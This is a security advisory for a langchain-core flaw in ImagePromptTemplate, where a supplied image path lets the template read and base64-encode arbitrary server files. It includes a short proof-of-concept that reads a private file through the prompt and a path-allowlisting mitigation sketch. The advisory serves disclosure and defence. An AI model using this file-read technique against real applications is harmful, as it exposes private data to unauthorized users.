Upgrade langchain-core to version 0.1.53, 0.2.43, 0.3.15 or higher.
langchain-core is a package for building applications with LLMs through composability.
Affected versions of this package are vulnerable to Exposure of Sensitive System Information to an Unauthorized Control Sphere in the ImagePromptTemplate class in image.py, which can be instantiated with input variables that can contain paths exposing files from the underlying filesystem. The output of the prompt template may be exposed to the model and subsequently to an unauthorized user.
from langchain_core.prompts import ChatPromptTemplate, HumanMessagePromptTemplate

prompt = ChatPromptTemplate([
    HumanMessagePromptTemplate.from_template(
        [{"type": "image_url", "image_url": {"path": "{image_path}"}}]
    )
])

# Input any file path; note it does not need to be an image file.
prompt.invoke({"image_path": "/path/to/private/file/on/server.xyz"})
# Output contains the base64-encoded contents of the file:
# -> ChatPromptValue(messages=[HumanMessage(content=[{"type": "image_url", "image_url": {"url": "data:{mime_type...};base64,{encoding...}"}}])])
# Using with a model:
from langchain.chat_models import init_chat_model
llm = init_chat_model("gpt-4o-mini")
chain = prompt | llm
# Note: for the model to respond, the file does need to be an image.
chain.invoke({"image_path": "/path/to/private/file/on/server.jpg"})
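Until you can upgrade, one common workaround for path-traversal issues like this is to validate any user-supplied path against an allowlisted directory before it ever reaches the prompt template. The sketch below is an illustration only, not part of langchain-core: the directory name and helper function are hypothetical, and it relies on `Path.is_relative_to` (Python 3.9+).

```python
from pathlib import Path

# Assumption for this sketch: user-visible images live under this directory.
ALLOWED_DIR = Path("/srv/app/images")

def safe_image_path(user_path: str) -> str:
    """Resolve a user-supplied path and reject anything that escapes ALLOWED_DIR."""
    resolved = (ALLOWED_DIR / user_path).resolve()
    # resolve() collapses ".." components and symlink-free absolute inputs,
    # so a traversal attempt ends up outside ALLOWED_DIR and is rejected.
    if not resolved.is_relative_to(ALLOWED_DIR.resolve()):
        raise ValueError(f"path escapes allowed directory: {user_path!r}")
    return str(resolved)

print(safe_image_path("cat.jpg"))
# A traversal attempt such as "../../etc/passwd" raises ValueError instead
# of being passed on to the template.
```

The validated string can then be supplied as `image_path` when invoking the prompt, so arbitrary server files are never read on behalf of an unauthorized user.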